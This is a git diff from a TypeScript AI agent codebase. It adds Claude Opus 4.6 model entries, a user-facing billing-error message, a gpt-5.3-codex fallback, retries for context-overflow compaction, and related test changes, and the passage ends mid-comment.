|
||||
"opus-4.6": "claude-opus-4-6",
|
||||
"opus-4.5": "claude-opus-4-5",
|
||||
"opus-4": "claude-opus-4-5",
|
||||
"opus-4": "claude-opus-4-6",
|
||||
|
||||
// Legacy Claude aliases (OpenCode Zen rotates model catalogs; keep old keys working).
|
||||
sonnet: "claude-opus-4-5",
|
||||
"sonnet-4": "claude-opus-4-5",
|
||||
haiku: "claude-opus-4-5",
|
||||
"haiku-3.5": "claude-opus-4-5",
|
||||
sonnet: "claude-opus-4-6",
|
||||
"sonnet-4": "claude-opus-4-6",
|
||||
haiku: "claude-opus-4-6",
|
||||
"haiku-3.5": "claude-opus-4-6",
|
||||
|
||||
// GPT-5.x family
|
||||
gpt5: "gpt-5.2",
|
||||
@@ -119,6 +123,7 @@ const MODEL_COSTS: Record<
|
||||
cacheRead: 0.107,
|
||||
cacheWrite: 0,
|
||||
},
|
||||
"claude-opus-4-6": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
|
||||
"claude-opus-4-5": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
|
||||
"gemini-3-pro": { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
|
||||
"gpt-5.1-codex-mini": {
|
||||
@@ -143,6 +148,7 @@ const DEFAULT_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
|
||||
|
||||
const MODEL_CONTEXT_WINDOWS: Record<string, number> = {
|
||||
"gpt-5.1-codex": 400000,
|
||||
"claude-opus-4-6": 1000000,
|
||||
"claude-opus-4-5": 200000,
|
||||
"gemini-3-pro": 1048576,
|
||||
"gpt-5.1-codex-mini": 400000,
|
||||
@@ -159,6 +165,7 @@ function getDefaultContextWindow(modelId: string): number {
|
||||
|
||||
const MODEL_MAX_TOKENS: Record<string, number> = {
|
||||
"gpt-5.1-codex": 128000,
|
||||
"claude-opus-4-6": 128000,
|
||||
"claude-opus-4-5": 64000,
|
||||
"gemini-3-pro": 65536,
|
||||
"gpt-5.1-codex-mini": 128000,
|
||||
@@ -195,6 +202,7 @@ function buildModelDefinition(modelId: string): ModelDefinitionConfig {
|
||||
*/
|
||||
const MODEL_NAMES: Record<string, string> = {
|
||||
"gpt-5.1-codex": "GPT-5.1 Codex",
|
||||
"claude-opus-4-6": "Claude Opus 4.6",
|
||||
"claude-opus-4-5": "Claude Opus 4.5",
|
||||
"gemini-3-pro": "Gemini 3 Pro",
|
||||
"gpt-5.1-codex-mini": "GPT-5.1 Codex Mini",
|
||||
@@ -222,6 +230,7 @@ function formatModelName(modelId: string): string {
|
||||
export function getOpencodeZenStaticFallbackModels(): ModelDefinitionConfig[] {
|
||||
const modelIds = [
|
||||
"gpt-5.1-codex",
|
||||
"claude-opus-4-6",
|
||||
"claude-opus-4-5",
|
||||
"gemini-3-pro",
|
||||
"gpt-5.1-codex-mini",
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
import type { AssistantMessage } from "@mariozechner/pi-ai";
|
||||
import { describe, expect, it } from "vitest";
|
||||
import { formatAssistantErrorText } from "./pi-embedded-helpers.js";
|
||||
import { BILLING_ERROR_USER_MESSAGE, formatAssistantErrorText } from "./pi-embedded-helpers.js";
|
||||
|
||||
describe("formatAssistantErrorText", () => {
|
||||
const makeAssistantError = (errorMessage: string): AssistantMessage =>
|
||||
@@ -53,4 +53,19 @@ describe("formatAssistantErrorText", () => {
|
||||
);
|
||||
expect(formatAssistantErrorText(msg)).toBe("LLM error server_error: Something exploded");
|
||||
});
|
||||
it("returns a friendly billing message for credit balance errors", () => {
|
||||
const msg = makeAssistantError("Your credit balance is too low to access the Anthropic API.");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
it("returns a friendly billing message for HTTP 402 errors", () => {
|
||||
const msg = makeAssistantError("HTTP 402 Payment Required");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
it("returns a friendly billing message for insufficient credits", () => {
|
||||
const msg = makeAssistantError("insufficient credits");
|
||||
const result = formatAssistantErrorText(msg);
|
||||
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -6,6 +6,7 @@ export {
|
||||
stripThoughtSignatures,
|
||||
} from "./pi-embedded-helpers/bootstrap.js";
|
||||
export {
|
||||
BILLING_ERROR_USER_MESSAGE,
|
||||
classifyFailoverReason,
|
||||
formatRawAssistantErrorForUi,
|
||||
formatAssistantErrorText,
|
||||
|
||||
@@ -3,6 +3,9 @@ import type { OpenClawConfig } from "../../config/config.js";
|
||||
import type { FailoverReason } from "./types.js";
|
||||
import { formatSandboxToolPolicyBlockedMessage } from "../sandbox.js";
|
||||
|
||||
export const BILLING_ERROR_USER_MESSAGE =
|
||||
"⚠️ API provider returned a billing error — your API key has run out of credits or has an insufficient balance. Check your provider's billing dashboard and top up or switch to a different API key.";
|
||||
|
||||
export function isContextOverflowError(errorMessage?: string): boolean {
|
||||
if (!errorMessage) {
|
||||
return false;
|
||||
@@ -368,6 +371,10 @@ export function formatAssistantErrorText(
|
||||
return "The AI service is temporarily overloaded. Please try again in a moment.";
|
||||
}
|
||||
|
||||
if (isBillingErrorMessage(raw)) {
|
||||
return BILLING_ERROR_USER_MESSAGE;
|
||||
}
|
||||
|
||||
if (isLikelyHttpErrorText(raw) || isRawApiErrorPayload(raw)) {
|
||||
return formatRawAssistantErrorForUi(raw);
|
||||
}
|
||||
@@ -403,6 +410,10 @@ export function sanitizeUserFacingText(text: string): string {
|
||||
);
|
||||
}
|
||||
|
||||
if (isBillingErrorMessage(trimmed)) {
|
||||
return BILLING_ERROR_USER_MESSAGE;
|
||||
}
|
||||
|
||||
if (isRawApiErrorPayload(trimmed) || isLikelyHttpErrorText(trimmed)) {
|
||||
return formatRawAssistantErrorForUi(trimmed);
|
||||
}
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
|
||||
vi.mock("../pi-model-discovery.js", () => ({
|
||||
discoverAuthStorage: vi.fn(() => ({ mocked: true })),
|
||||
@@ -6,6 +6,7 @@ vi.mock("../pi-model-discovery.js", () => ({
|
||||
}));
|
||||
|
||||
import type { OpenClawConfig } from "../../config/config.js";
|
||||
import { discoverModels } from "../pi-model-discovery.js";
|
||||
import { buildInlineProviderModels, resolveModel } from "./model.js";
|
||||
|
||||
const makeModel = (id: string) => ({
|
||||
@@ -18,6 +19,12 @@ const makeModel = (id: string) => ({
|
||||
maxTokens: 1,
|
||||
});
|
||||
|
||||
beforeEach(() => {
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn(() => null),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
});
|
||||
|
||||
describe("buildInlineProviderModels", () => {
|
||||
it("attaches provider ids to inline models", () => {
|
||||
const providers = {
|
||||
@@ -127,4 +134,74 @@ describe("resolveModel", () => {
|
||||
expect(result.model?.provider).toBe("custom");
|
||||
expect(result.model?.id).toBe("missing-model");
|
||||
});
|
||||
|
||||
it("builds an openai-codex fallback for gpt-5.3-codex", () => {
|
||||
const templateModel = {
|
||||
id: "gpt-5.2-codex",
|
||||
name: "GPT-5.2 Codex",
|
||||
provider: "openai-codex",
|
||||
api: "openai-codex-responses",
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
input: ["text", "image"] as const,
|
||||
cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
|
||||
contextWindow: 272000,
|
||||
maxTokens: 128000,
|
||||
};
|
||||
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn((provider: string, modelId: string) => {
|
||||
if (provider === "openai-codex" && modelId === "gpt-5.2-codex") {
|
||||
return templateModel;
|
||||
}
|
||||
return null;
|
||||
}),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
|
||||
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent");
|
||||
|
||||
expect(result.error).toBeUndefined();
|
||||
expect(result.model).toMatchObject({
|
||||
provider: "openai-codex",
|
||||
id: "gpt-5.3-codex",
|
||||
api: "openai-codex-responses",
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
contextWindow: 272000,
|
||||
maxTokens: 128000,
|
||||
});
|
||||
});
|
||||
|
||||
it("keeps unknown-model errors for non-gpt-5 openai-codex ids", () => {
|
||||
const result = resolveModel("openai-codex", "gpt-4.1-mini", "/tmp/agent");
|
||||
expect(result.model).toBeUndefined();
|
||||
expect(result.error).toBe("Unknown model: openai-codex/gpt-4.1-mini");
|
||||
});
|
||||
|
||||
it("uses codex fallback even when openai-codex provider is configured", () => {
|
||||
// This test verifies the ordering: codex fallback must fire BEFORE the generic providerCfg fallback.
|
||||
// If ordering is wrong, the generic fallback would use api: "openai-responses" (the default)
|
||||
// instead of "openai-codex-responses".
|
||||
const cfg: OpenClawConfig = {
|
||||
models: {
|
||||
providers: {
|
||||
"openai-codex": {
|
||||
baseUrl: "https://custom.example.com",
|
||||
// No models array, or models without gpt-5.3-codex
|
||||
},
|
||||
},
|
||||
},
|
||||
} as OpenClawConfig;
|
||||
|
||||
vi.mocked(discoverModels).mockReturnValue({
|
||||
find: vi.fn(() => null),
|
||||
} as unknown as ReturnType<typeof discoverModels>);
|
||||
|
||||
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent", cfg);
|
||||
|
||||
expect(result.error).toBeUndefined();
|
||||
expect(result.model?.api).toBe("openai-codex-responses");
|
||||
expect(result.model?.id).toBe("gpt-5.3-codex");
|
||||
expect(result.model?.provider).toBe("openai-codex");
|
||||
});
|
||||
});
|
||||
|
||||
@@ -19,6 +19,50 @@ type InlineProviderConfig = {
|
||||
models?: ModelDefinitionConfig[];
|
||||
};
|
||||
|
||||
const OPENAI_CODEX_GPT_53_MODEL_ID = "gpt-5.3-codex";
|
||||
|
||||
const OPENAI_CODEX_TEMPLATE_MODEL_IDS = ["gpt-5.2-codex"] as const;
|
||||
|
||||
function resolveOpenAICodexGpt53FallbackModel(
|
||||
provider: string,
|
||||
modelId: string,
|
||||
modelRegistry: ModelRegistry,
|
||||
): Model<Api> | undefined {
|
||||
const normalizedProvider = normalizeProviderId(provider);
|
||||
const trimmedModelId = modelId.trim();
|
||||
if (normalizedProvider !== "openai-codex") {
|
||||
return undefined;
|
||||
}
|
||||
if (trimmedModelId.toLowerCase() !== OPENAI_CODEX_GPT_53_MODEL_ID) {
|
||||
return undefined;
|
||||
}
|
||||
|
||||
for (const templateId of OPENAI_CODEX_TEMPLATE_MODEL_IDS) {
|
||||
const template = modelRegistry.find(normalizedProvider, templateId) as Model<Api> | null;
|
||||
if (!template) {
|
||||
continue;
|
||||
}
|
||||
return normalizeModelCompat({
|
||||
...template,
|
||||
id: trimmedModelId,
|
||||
name: trimmedModelId,
|
||||
} as Model<Api>);
|
||||
}
|
||||
|
||||
return normalizeModelCompat({
|
||||
id: trimmedModelId,
|
||||
name: trimmedModelId,
|
||||
api: "openai-codex-responses",
|
||||
provider: normalizedProvider,
|
||||
baseUrl: "https://chatgpt.com/backend-api",
|
||||
reasoning: true,
|
||||
input: ["text", "image"],
|
||||
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
|
||||
contextWindow: DEFAULT_CONTEXT_TOKENS,
|
||||
maxTokens: DEFAULT_CONTEXT_TOKENS,
|
||||
} as Model<Api>);
|
||||
}
|
||||
|
||||
export function buildInlineProviderModels(
|
||||
providers: Record<string, InlineProviderConfig>,
|
||||
): InlineModelEntry[] {
|
||||
@@ -85,6 +129,17 @@ export function resolveModel(
|
||||
modelRegistry,
|
||||
};
|
||||
}
|
||||
// Codex gpt-5.3 forward-compat fallback must be checked BEFORE the generic providerCfg fallback.
|
||||
// Otherwise, if cfg.models.providers["openai-codex"] is configured, the generic fallback fires
|
||||
// with api: "openai-responses" instead of the correct "openai-codex-responses".
|
||||
const codexForwardCompat = resolveOpenAICodexGpt53FallbackModel(
|
||||
provider,
|
||||
modelId,
|
||||
modelRegistry,
|
||||
);
|
||||
if (codexForwardCompat) {
|
||||
return { model: codexForwardCompat, authStorage, modelRegistry };
|
||||
}
|
||||
const providerCfg = providers[provider];
|
||||
if (providerCfg || modelId.startsWith("mock-")) {
|
||||
const fallbackModel: Model<Api> = normalizeModelCompat({
|
||||
|
||||
@@ -137,6 +137,7 @@ vi.mock("../pi-embedded-helpers.js", async () => {
|
||||
isFailoverErrorMessage: vi.fn(() => false),
|
||||
isAuthAssistantError: vi.fn(() => false),
|
||||
isRateLimitAssistantError: vi.fn(() => false),
|
||||
isBillingAssistantError: vi.fn(() => false),
|
||||
classifyFailoverReason: vi.fn(() => null),
|
||||
formatAssistantErrorText: vi.fn(() => ""),
|
||||
pickFallbackThinkingLevel: vi.fn(() => null),
|
||||
@@ -214,7 +215,9 @@ describe("overflow compaction in run loop", () => {
|
||||
);
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
|
||||
expect(log.warn).toHaveBeenCalledWith(
|
||||
expect.stringContaining("context overflow detected; attempting auto-compaction"),
|
||||
expect.stringContaining(
|
||||
"context overflow detected (attempt 1/3); attempting auto-compaction",
|
||||
),
|
||||
);
|
||||
expect(log.info).toHaveBeenCalledWith(expect.stringContaining("auto-compaction succeeded"));
|
||||
// Should not be an error result
|
||||
@@ -241,31 +244,68 @@ describe("overflow compaction in run loop", () => {
|
||||
expect(log.warn).toHaveBeenCalledWith(expect.stringContaining("auto-compaction failed"));
|
||||
});
|
||||
|
||||
it("returns error if overflow happens again after compaction", async () => {
|
||||
it("retries compaction up to 3 times before giving up", async () => {
|
||||
const overflowError = new Error("request_too_large: Request size exceeds model context window");
|
||||
|
||||
// 4 overflow errors: 3 compaction retries + final failure
|
||||
mockedRunEmbeddedAttempt
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
|
||||
|
||||
mockedCompactDirect
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 3", firstKeptEntryId: "entry-7", tokensBefore: 140000 },
|
||||
});
|
||||
|
||||
const result = await runEmbeddedPiAgent(baseParams);
|
||||
|
||||
// Compaction attempted 3 times (max)
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(3);
|
||||
// 4 attempts: 3 overflow+compact+retry cycles + final overflow → error
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(4);
|
||||
expect(result.meta.error?.kind).toBe("context_overflow");
|
||||
expect(result.payloads?.[0]?.isError).toBe(true);
|
||||
});
|
||||
|
||||
it("succeeds after second compaction attempt", async () => {
|
||||
const overflowError = new Error("request_too_large: Request size exceeds model context window");
|
||||
|
||||
mockedRunEmbeddedAttempt
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
|
||||
.mockResolvedValueOnce(makeAttemptResult({ promptError: null }));
|
||||
|
||||
mockedCompactDirect.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: {
|
||||
summary: "Compacted",
|
||||
firstKeptEntryId: "entry-3",
|
||||
tokensBefore: 180000,
|
||||
},
|
||||
});
|
||||
mockedCompactDirect
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
|
||||
})
|
||||
.mockResolvedValueOnce({
|
||||
ok: true,
|
||||
compacted: true,
|
||||
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
|
||||
});
|
||||
|
||||
const result = await runEmbeddedPiAgent(baseParams);
|
||||
|
||||
// Compaction attempted only once
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(1);
|
||||
// Two attempts: first overflow -> compact -> retry -> second overflow -> return error
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
|
||||
expect(result.meta.error?.kind).toBe("context_overflow");
|
||||
expect(result.payloads?.[0]?.isError).toBe(true);
|
||||
expect(mockedCompactDirect).toHaveBeenCalledTimes(2);
|
||||
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(3);
|
||||
expect(result.meta.error).toBeUndefined();
|
||||
});
|
||||
|
||||
it("does not attempt compaction for compaction_failure errors", async () => {
|
||||
|
||||
@@ -29,9 +29,11 @@ import {
|
||||
import { normalizeProviderId } from "../model-selection.js";
|
||||
import { ensureOpenClawModelsJson } from "../models-config.js";
|
||||
import {
|
||||
BILLING_ERROR_USER_MESSAGE,
|
||||
classifyFailoverReason,
|
||||
formatAssistantErrorText,
|
||||
isAuthAssistantError,
|
||||
isBillingAssistantError,
|
||||
isCompactionFailureError,
|
||||
isContextOverflowError,
|
||||
isFailoverAssistantError,
|
||||
@@ -303,7 +305,8 @@ export async function runEmbeddedPiAgent(
|
||||
}
|
||||
}
|
||||
|
||||
let overflowCompactionAttempted = false;
|
||||
const MAX_OVERFLOW_COMPACTION_ATTEMPTS = 3;
|
||||
let overflowCompactionAttempts = 0;
|
||||
try {
|
||||
while (true) {
|
||||
attemptedThinking.add(thinkLevel);
|
||||
@@ -373,13 +376,23 @@ export async function runEmbeddedPiAgent(
|
||||
if (promptError && !aborted) {
|
||||
const errorText = describeUnknownError(promptError);
|
||||
if (isContextOverflowError(errorText)) {
|
||||
const msgCount = attempt.messagesSnapshot?.length ?? 0;
|
||||
log.warn(
|
||||
`[context-overflow-diag] sessionKey=${params.sessionKey ?? params.sessionId} ` +
|
||||
`provider=${provider}/${modelId} messages=${msgCount} ` +
|
||||
`sessionFile=${params.sessionFile} compactionAttempts=${overflowCompactionAttempts} ` +
|
||||
`error=${errorText.slice(0, 200)}`,
|
||||
);
|
||||
const isCompactionFailure = isCompactionFailureError(errorText);
|
||||
// Attempt auto-compaction on context overflow (not compaction_failure)
|
||||
if (!isCompactionFailure && !overflowCompactionAttempted) {
|
||||
if (
|
||||
!isCompactionFailure &&
|
||||
overflowCompactionAttempts < MAX_OVERFLOW_COMPACTION_ATTEMPTS
|
||||
) {
|
||||
overflowCompactionAttempts++;
|
||||
log.warn(
|
||||
`context overflow detected; attempting auto-compaction for ${provider}/${modelId}`,
|
||||
`context overflow detected (attempt ${overflowCompactionAttempts}/${MAX_OVERFLOW_COMPACTION_ATTEMPTS}); attempting auto-compaction for ${provider}/${modelId}`,
|
||||
);
|
||||
overflowCompactionAttempted = true;
|
||||
const compactResult = await compactEmbeddedPiSessionDirect({
|
||||
sessionId: params.sessionId,
|
||||
sessionKey: params.sessionKey,
|
||||
@@ -538,6 +551,7 @@ export async function runEmbeddedPiAgent(
|
||||
|
||||
const authFailure = isAuthAssistantError(lastAssistant);
|
||||
const rateLimitFailure = isRateLimitAssistantError(lastAssistant);
|
||||
const billingFailure = isBillingAssistantError(lastAssistant);
|
||||
const failoverFailure = isFailoverAssistantError(lastAssistant);
|
||||
const assistantFailoverReason = classifyFailoverReason(lastAssistant?.errorMessage ?? "");
|
||||
const cloudCodeAssistFormatError = attempt.cloudCodeAssistFormatError;
|
||||
@@ -609,9 +623,11 @@ export async function runEmbeddedPiAgent(
|
||||
? "LLM request timed out."
|
||||
: rateLimitFailure
|
||||
? "LLM request rate limited."
|
||||
: authFailure
|
||||
? "LLM request unauthorized."
|
||||
: "LLM request failed.");
|
||||
: billingFailure
|
||||
? BILLING_ERROR_USER_MESSAGE
|
||||
: authFailure
|
||||
? "LLM request unauthorized."
|
||||
: "LLM request failed.");
|
||||
const status =
|
||||
resolveFailoverStatus(assistantFailoverReason ?? "unknown") ??
|
||||
(isTimeoutErrorMessage(message) ? 408 : undefined);
|
||||
|
||||
@@ -1,10 +1,50 @@
|
||||
import fs from "node:fs";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { afterAll, beforeAll, describe, expect, it, vi } from "vitest";
|
||||
import type { OpenClawConfig } from "../config/config.js";
|
||||
import type { ExecApprovalsResolved } from "../infra/exec-approvals.js";
|
||||
import { createOpenClawCodingTools } from "./pi-tools.js";
|
||||
|
||||
const previousBundledPluginsDir = process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
|
||||
|
||||
beforeAll(() => {
|
||||
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = path.join(
|
||||
os.tmpdir(),
|
||||
"openclaw-test-no-bundled-extensions",
|
||||
);
|
||||
});
|
||||
|
||||
afterAll(() => {
|
||||
if (previousBundledPluginsDir === undefined) {
|
||||
delete process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
|
||||
} else {
|
||||
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = previousBundledPluginsDir;
|
||||
}
|
||||
});
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return {
|
||||
...mod,
|
||||
getShellPathFromLoginShell: vi.fn(() => "/usr/bin:/bin"),
|
||||
resolveShellEnvFallbackTimeoutMs: vi.fn(() => 500),
|
||||
};
|
||||
});
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
getPluginToolMeta: () => undefined,
|
||||
resolvePluginTools: () => [],
|
||||
}));
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return { ...mod, getShellPathFromLoginShell: () => null };
|
||||
});
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
resolvePluginTools: () => [],
|
||||
getPluginToolMeta: () => undefined,
|
||||
}));
|
||||
|
||||
vi.mock("../infra/exec-approvals.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/exec-approvals.js")>();
|
||||
@@ -46,6 +86,7 @@ describe("createOpenClawCodingTools safeBins", () => {
|
||||
return;
|
||||
}
|
||||
|
||||
const { createOpenClawCodingTools } = await import("./pi-tools.js");
|
||||
const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-safe-bins-"));
|
||||
const cfg: OpenClawConfig = {
|
||||
tools: {
|
||||
@@ -68,10 +109,22 @@ describe("createOpenClawCodingTools safeBins", () => {
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
const marker = `safe-bins-${Date.now()}`;
|
||||
const result = await execTool!.execute("call1", {
|
||||
command: `echo ${marker}`,
|
||||
workdir: tmpDir,
|
||||
});
|
||||
const prevShellEnvTimeoutMs = process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
|
||||
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = "1000";
|
||||
const result = await (async () => {
|
||||
try {
|
||||
return await execTool!.execute("call1", {
|
||||
command: `echo ${marker}`,
|
||||
workdir: tmpDir,
|
||||
});
|
||||
} finally {
|
||||
if (prevShellEnvTimeoutMs === undefined) {
|
||||
delete process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
|
||||
} else {
|
||||
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = prevShellEnvTimeoutMs;
|
||||
}
|
||||
}
|
||||
})();
|
||||
const text = result.content.find((content) => content.type === "text")?.text ?? "";
|
||||
|
||||
expect(result.details.status).toBe("completed");
|
||||
|
||||
@@ -1,9 +1,18 @@
|
||||
import fs from "node:fs/promises";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { describe, expect, it } from "vitest";
|
||||
import { describe, expect, it, vi } from "vitest";
|
||||
import { createOpenClawCodingTools } from "./pi-tools.js";
|
||||
|
||||
vi.mock("../plugins/tools.js", () => ({
|
||||
getPluginToolMeta: () => undefined,
|
||||
resolvePluginTools: () => [],
|
||||
}));
|
||||
|
||||
vi.mock("../infra/shell-env.js", async (importOriginal) => {
|
||||
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
|
||||
return { ...mod, getShellPathFromLoginShell: () => null };
|
||||
});
|
||||
async function withTempDir<T>(prefix: string, fn: (dir: string) => Promise<T>) {
|
||||
const dir = await fs.mkdtemp(path.join(os.tmpdir(), prefix));
|
||||
try {
|
||||
@@ -22,12 +31,11 @@ describe("workspace path resolution", () => {
|
||||
it("reads relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "read.txt";
|
||||
const contents = "workspace read ok";
|
||||
await fs.writeFile(path.join(workspaceDir, testFile), contents, "utf8");
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const readTool = tools.find((tool) => tool.name === "read");
|
||||
@@ -36,7 +44,7 @@ describe("workspace path resolution", () => {
|
||||
const result = await readTool?.execute("ws-read", { path: testFile });
|
||||
expect(getTextContent(result)).toContain(contents);
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -45,11 +53,10 @@ describe("workspace path resolution", () => {
|
||||
it("writes relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "write.txt";
|
||||
const contents = "workspace write ok";
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const writeTool = tools.find((tool) => tool.name === "write");
|
||||
@@ -63,7 +70,7 @@ describe("workspace path resolution", () => {
|
||||
const written = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
|
||||
expect(written).toBe(contents);
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -72,11 +79,10 @@ describe("workspace path resolution", () => {
|
||||
it("edits relative paths against workspaceDir even after cwd changes", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-cwd-", async (otherDir) => {
|
||||
const prevCwd = process.cwd();
|
||||
const testFile = "edit.txt";
|
||||
await fs.writeFile(path.join(workspaceDir, testFile), "hello world", "utf8");
|
||||
|
||||
process.chdir(otherDir);
|
||||
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
|
||||
try {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const editTool = tools.find((tool) => tool.name === "edit");
|
||||
@@ -91,7 +97,7 @@ describe("workspace path resolution", () => {
|
||||
const updated = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
|
||||
expect(updated).toBe("hello openclaw");
|
||||
} finally {
|
||||
process.chdir(prevCwd);
|
||||
cwdSpy.mockRestore();
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -99,7 +105,7 @@ describe("workspace path resolution", () => {
|
||||
|
||||
it("defaults exec cwd to workspaceDir when workdir is omitted", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
|
||||
const execTool = tools.find((tool) => tool.name === "exec");
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
@@ -122,7 +128,7 @@ describe("workspace path resolution", () => {
|
||||
it("lets exec workdir override the workspace default", async () => {
|
||||
await withTempDir("openclaw-ws-", async (workspaceDir) => {
|
||||
await withTempDir("openclaw-override-", async (overrideDir) => {
|
||||
const tools = createOpenClawCodingTools({ workspaceDir });
|
||||
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
|
||||
const execTool = tools.find((tool) => tool.name === "exec");
|
||||
expect(execTool).toBeDefined();
|
||||
|
||||
|
||||
@@ -3,6 +3,7 @@ import { describe, expect, it } from "vitest";
|
||||
import {
|
||||
sanitizeToolCallInputs,
|
||||
sanitizeToolUseResultPairing,
|
||||
repairToolUseResultPairing,
|
||||
} from "./session-transcript-repair.js";
|
||||
|
||||
describe("sanitizeToolUseResultPairing", () => {
|
||||
@@ -112,6 +113,100 @@ describe("sanitizeToolUseResultPairing", () => {
|
||||
expect(out.some((m) => m.role === "toolResult")).toBe(false);
|
||||
expect(out.map((m) => m.role)).toEqual(["user", "assistant"]);
|
||||
});
|
||||
|
||||
it("skips tool call extraction for assistant messages with stopReason 'error'", () => {
|
||||
// When an assistant message has stopReason: "error", its tool_use blocks may be
